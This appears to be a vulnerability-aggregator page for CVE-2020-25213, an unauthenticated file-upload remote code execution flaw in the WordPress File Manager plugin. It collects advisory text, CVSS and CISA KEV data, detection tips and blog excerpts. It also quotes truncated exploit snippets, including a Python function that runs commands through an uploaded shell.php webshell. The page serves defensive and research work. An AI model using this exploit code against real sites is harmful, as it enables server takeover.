CVE-2020-25213
published 2020-09-09CVE-2020-25213: The File Manager (wp-file-manager) plugin before 6.9 for WordPress allows remote attackers to upload and execute arbitrary PHP code because it renames an…
PriorityP199critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2022-05-03
Exploited in the wild
EPSS
97.33%
99.9th percentile
The File Manager (wp-file-manager) plugin before 6.9 for WordPress allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory. This was exploited in the wild in August and September 2020.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| filemanagerpro | file_manager | < 6.9 | 6.9 |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect unauthenticated POST requests to the vulnerable elFinder connector endpoint, which requires no authentication and accepts arbitrary file uploads ↗
- →Monitor for GET requests to PHP files dropped under the wp-file-manager lib/files/ directory, especially with a 'cmd' query parameter indicating webshell execution ↗
- →Fingerprint the vulnerable endpoint by sending a bare GET/POST; a response of {"error":["errUnknownCmd"]} confirms the vulnerable connector is exposed ↗
- →Palo Alto Networks Threat Prevention covers this vulnerability with TID 59286; use this signature ID for NGFW detection ↗
- →The Nuclei template matcher looks for both 'poc.txt' and 'added' in the JSON response body with Content-Type application/json and HTTP 200 to confirm successful exploitation ↗
- ·The vulnerable file connector.minimal.php is only present in wp-file-manager versions 6.0 through 6.8; version 6.9 removes the file and is not vulnerable ↗
- ·The connector endpoint has no access restrictions whatsoever — no authentication is required to reach or abuse it, making network-layer blocking the most reliable mitigation if patching is delayed ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck10.0CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-w774-7g7w-83fx: The File Manager (wp-file-manager) plugin before 6
ghsa_unreviewed·2022-05-24
CVE-2020-25213 [HIGH] CWE-434 GHSA-w774-7g7w-83fx: The File Manager (wp-file-manager) plugin before 6
The File Manager (wp-file-manager) plugin before 6.9 for WordPress allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory. This was exploited in the wild in August and September 2020.
VulnCheck
WordPress File Manager Plugin Remote Code Execution Vulnerability
vulncheck·2020·CVSS 10.0
CVE-2020-25213 [CRITICAL] CWE-434 WordPress File Manager Plugin Remote Code Execution Vulnerability
WordPress File Manager Plugin Remote Code Execution Vulnerability
WordPress File Manager plugin contains a remote code execution vulnerability that allows unauthenticated users to execute PHP code and upload malicious files on a target site.
Affected: WordPress File Manager Plugin
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.cve.org/CVERecord?id=CVE-2020-25213; https://unit42.paloaltonetworks.com/cve-2020-25213/; https://unit42.paloaltonetworks.com/network-attack-trends-winter-2020/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-14&host_type=src&vulnerability=cve-2020-25213; https://dashboard.shadowserver.org/statis
CISA
WordPress File Manager Plugin Remote Code Execution Vulnerability
cisa·2021-11-03·CVSS 9.8
CVE-2020-25213 [CRITICAL] CWE-434 WordPress File Manager Plugin Remote Code Execution Vulnerability
Vulnerability: WordPress File Manager Plugin Remote Code Execution Vulnerability
Affected: WordPress File Manager Plugin
WordPress File Manager plugin contains a remote code execution vulnerability that allows unauthenticated users to execute PHP code and upload malicious files on a target site.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2020-25213
Remediation Due Date: 2022-05-03
No detection rules found.
Exploit-DB
WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE
exploitdb·2023-04-03·CVSS 10.0
CVE-2020-25213 [CRITICAL] WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE
WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE
---
#!/usr/bin/env
# Exploit Title: WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE
# Date: [ 22-01-2023 ]
# Exploit Author: [BLY]
# Vendor Homepage: [https://wpscan.com/vulnerability/10389]
# Version: [ File Manager plugin 6.0-6.9]
# Tested on: [ Debian ]
# CVE : [ CVE-2020-25213 ]
import sys,signal,time,requests
from bs4 import BeautifulSoup
#from pprint import pprint
def handler(sig,frame):
print ("[!]Saliendo")
sys.exit(1)
signal.signal(signal.SIGINT,handler)
def commandexec(command):
exec_url = url+"/wp-content/plugins/wp-file-manager/lib/php/../files/shell.php"
params = {
"cmd":command
}
r=requests.get(exec_url,params=params)
soup = BeautifulSoup(r.text, 'html.parser')
te
Exploit-DB
WordPress Plugin Wp-FileManager 6.8 - RCE
exploitdb·2020-12-02·CVSS 10.0
CVE-2020-25213 [CRITICAL] WordPress Plugin Wp-FileManager 6.8 - RCE
WordPress Plugin Wp-FileManager 6.8 - RCE
---
# Exploit Title: WordPress Plugin Wp-FileManager 6.8 - RCE
# Date: September 4,2020
# Exploit Author: Mansoor R (@time4ster)
# CVE: CVE-2020-25213
# Version Affected: 6.0 to 6.8
# Vendor URL: https://wordpress.org/plugins/wp-file-manager/
# Patch: Upgrade to wp-file-manager 6.9 (or above)
# Tested on: wp-file-manager 6.0 (https://downloads.wordpress.org/plugin/wp-file-manager.6.0.zip) on Ubuntu 18.04
#!/bin/bash
#Description:
#The core of the issue began with the File Manager plugin renaming the extension on the elFinder library’s connector.minimal.php.dist file to .php so it could be executed directly, even though the connector file was not used by the File Manager itself. Such libraries often include example files that are not intended to
Metasploit
WordPress File Manager Unauthenticated Remote Code Execution
metasploit
WordPress File Manager Unauthenticated Remote Code Execution
WordPress File Manager Unauthenticated Remote Code Execution
The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.
Nuclei
WordPress File Manager Plugin - Remote Code Execution
nuclei·CVSS 9.8
CVE-2020-25213 [CRITICAL] WordPress File Manager Plugin - Remote Code Execution
WordPress File Manager Plugin - Remote Code Execution
The WordPress File Manager plugin prior to version 6.9 is susceptible to remote code execution. The vulnerability allows unauthenticated remote attackers to upload .php files.
Template:
id: CVE-2020-25213
# Uploaded file will be accessible at:-
# http://localhost/wp-content/plugins/wp-file-manager/lib/files/poc.txt
info:
name: WordPress File Manager Plugin - Remote Code Execution
author: foulenzer
severity: critical
description: The WordPress File Manager plugin prior to version 6.9 is susceptible to remote code execution. The vulnerability allows unauthenticated remote attackers to upload .php files.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected WordPress s
Qualys
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR | Qualys
blogs_qualys·2022-02-23
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR | Qualys
#### Table of Contents
- Situation
- Directive Scope
- CISA Catalog of Known Exploited Vulnerabilities
- Detect CISA Vulnerabilities Using Qualys VMDR
- CISA Exploited RTI
- Detailed Operational Dashboard
- Remediation
- Federal Enterprises and Agencies Can Act Now
- Summary
- Getting Started
CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively.
## Situation
Last November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a Binding Operational Directiv
Tenable
One Year Later: What Can We Learn from Zerologon?
blogs_tenable·2021-08-11
One Year Later: What Can We Learn from Zerologon?
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Unit42
Network Attack Trends: Internet of Threats (November 2020-January 2021)
blogs_unit42·2021-04-12·CVSS 7.5
CVE-2020-28188 [HIGH] Network Attack Trends: Internet of Threats (November 2020-January 2021)
# Executive Summary
Unit 42 researchers analyzed network attack trends over Winter 2020 and discovered many interesting exploits in the wild. During the period of Nov. 2020 to Jan. 2021, the majority of the attacks we observed were classified as critical (75%), compared to the 50.4% we reported in the fall of 2020. Several newly observed exploits, including CVE-2020-28188, CVE-2020-17519, and CVE-2020-29227, have emerged and were continuously being exploited in the wild as of late 2020 to early 2021.
This blog provides details of the newly observed exploits as well as a dive deep into the exploitation analysis, vendor analysis, attack origin, and attack category distribution.
Palo Alto Networks Next-Generation Firewall customers are protected from these attacks with the URL Filtering an
Unit42
Network Attack Trends: Internet of Threats (November 2020-January 2021)
blogs_unit42·2021-04-12·CVSS 7.5
[HIGH] Network Attack Trends: Internet of Threats (November 2020-January 2021)
Threat Research Center
Trend Reports
Vulnerabilities
## Network Attack Trends: Internet of Threats (November 2020-January 2021)
Lei Xu
Yue Guan
Vaibhav Singhal
Published: April 12, 2021
Malware
Trend Reports
Vulnerabilities
Botnet
DDoS
Exploit kit
IoT
Network security trends
## Executive Summary
Unit 42 researchers analyzed network attack trends over Winter 2020 and discovered many interesting exploits in the wild. During the period of Nov. 2020 to Jan. 2021, the majority of the attacks we observed were classified as critical (75%), compared to the 50.4% we reported in the fall of 2020 . Several newly observed exploits, including CVE-2020-28188 , CVE-2020-17519 , and CVE-2020-29227 , have emerged and were continuously being exploited in the wild as of late 2020 to earl
Unit42
Exploits in the Wild for WordPress File Manager RCE Vulnerability (CVE-2020-25213)
blogs_unit42·2021-02-05·CVSS 5.4
CVE-2020-25213 [MEDIUM] Exploits in the Wild for WordPress File Manager RCE Vulnerability (CVE-2020-25213)
## Executive Summary
In December 2020, Unit 42 researchers observed attempts to exploit CVE-2020-25213, which is a file upload vulnerability in the WordPress File Manager plugin. Successful exploitation of this vulnerability allows an attacker to upload an arbitrary file with arbitrary names and extensions, leading to Remote Code Execution (RCE) on the targeted web server.
This exploit was used by attackers to install webshells, which in turn were used to install Kinsing, malware that runs a malicious cryptominer from the H2miner family. Kinsing is based on the Golang programming language, and its ultimate purpose is to be used in cryptojacking attacks on container environments.
Palo Alto Networks customers are protected from CVE-2020-25213 and Kinsing with Cortex XDR, AutoFocus and Nex
Unit42
Exploits in the Wild for WordPress File Manager RCE Vulnerability (CVE-2020-25213)
blogs_unit42·2021-02-05·CVSS 5.4
CVE-2020-25213 [MEDIUM] Exploits in the Wild for WordPress File Manager RCE Vulnerability (CVE-2020-25213)
Threat Research Center
Threat Research
Vulnerabilities
## Exploits in the Wild for WordPress File Manager RCE Vulnerability (CVE-2020-25213)
Nadav Markus
Efi Barkayev
Gal De Leon
Published: February 5, 2021
Threat Research
Vulnerabilities
Cryptocurrency mining
Cryptojacking
CVE-2020-25213
Kinsing
Remote Code Execution
WordPress
## Executive Summary
In December 2020, Unit 42 researchers observed attempts to exploit CVE-2020-25213 , which is a file upload vulnerability in the WordPress File Manager plugin. Successful exploitation of this vulnerability allows an attacker to upload an arbitrary file with arbitrary names and extensions, leading to Remote Code Execution (RCE) on the targeted web server.
This exploit was used by attackers to install webshells, which in turn
Unit42
Network Attack Trends: Internet of Threats (August-October 2020)
blogs_unit42·2021-01-22·CVSS 9.8
CVE-2012-2311 [CRITICAL] Network Attack Trends: Internet of Threats (August-October 2020)
Threat Research Center
Trend Reports
Vulnerabilities
## Network Attack Trends: Internet of Threats (August-October 2020)
Yue Guan
Lei Xu
Ken Hsu
Zhibin Zhang
Published: January 22, 2021
Malware
Trend Reports
Vulnerabilities
DDoS
Exploits
IoT
Network security trends
## Executive Summary
Unit 42 researchers observed interesting attack trends from August-October 2020. Despite a surge in scanner activities and HTTP directory traversal exploitation attempts, CVE-2012-2311 and CVE-2012-1823 , which were the most commonly exploited vulnerabilities in the wild in early summer 2020 , are no longer at the top of that list. Several new critical exploits, including but not limited to CVE-2020-17496 and CVE-2020-25213 , have emerged and were being utilized at a constant and concern
Unit42
Network Attack Trends: Internet of Threats (August-October 2020)
blogs_unit42·2021-01-22·CVSS 9.8
CVE-2012-2311 [CRITICAL] Network Attack Trends: Internet of Threats (August-October 2020)
## Executive Summary
Unit 42 researchers observed interesting attack trends from August-October 2020. Despite a surge in scanner activities and HTTP directory traversal exploitation attempts, CVE-2012-2311 and CVE-2012-1823, which were the most commonly exploited vulnerabilities in the wild in early summer 2020, are no longer at the top of that list. Several new critical exploits, including but not limited to CVE-2020-17496 and CVE-2020-25213, have emerged and were being utilized at a constant and concerning rate as of fall 2020. To complicate matters, malicious actors are well aware that new exploits aren’t always needed to get the job done. Based on observations of malicious traffic for the designated three months, weaponized ThinkPHP vulnerabilities like CVE-2018-20062 and CVE-2019-908
Tenable
CVE-2020-25213: Critical Vulnerability in File Manager WordPress Plugin Exploited in the Wild
blogs_tenable·2020-09-02·CVSS 10.0
[CRITICAL] CVE-2020-25213: Critical Vulnerability in File Manager WordPress Plugin Exploited in the Wild
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
http://packetstormsecurity.com/files/160003/WordPress-File-Manager-6.8-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/171650/WordPress-File-Manager-6.9-Shell-Upload.htmlhttps://github.com/w4fz5uck5/wp-file-manager-0dayhttps://hotforsecurity.bitdefender.com/blog/wordpress-websites-attacked-via-file-manager-plugin-vulnerability-24048.htmlhttps://plugins.trac.wordpress.org/changeset/2373068https://seravo.com/blog/0-day-vulnerability-in-wp-file-manager/https://wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/https://wordpress.org/plugins/wp-file-manager/#developershttps://zdnet.com/article/millions-of-wordpress-sites-are-being-probed-attacked-with-recent-plugin-bug/http://packetstormsecurity.com/files/160003/WordPress-File-Manager-6.8-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/171650/WordPress-File-Manager-6.9-Shell-Upload.htmlhttps://github.com/w4fz5uck5/wp-file-manager-0dayhttps://hotforsecurity.bitdefender.com/blog/wordpress-websites-attacked-via-file-manager-plugin-vulnerability-24048.htmlhttps://plugins.trac.wordpress.org/changeset/2373068https://seravo.com/blog/0-day-vulnerability-in-wp-file-manager/https://wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/https://wordpress.org/plugins/wp-file-manager/#developershttps://zdnet.com/article/millions-of-wordpress-sites-are-being-probed-attacked-with-recent-plugin-bug/https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-25213
2020-09-09
Published
2021-11-03
Added to CISA KEV
Exploited in the wild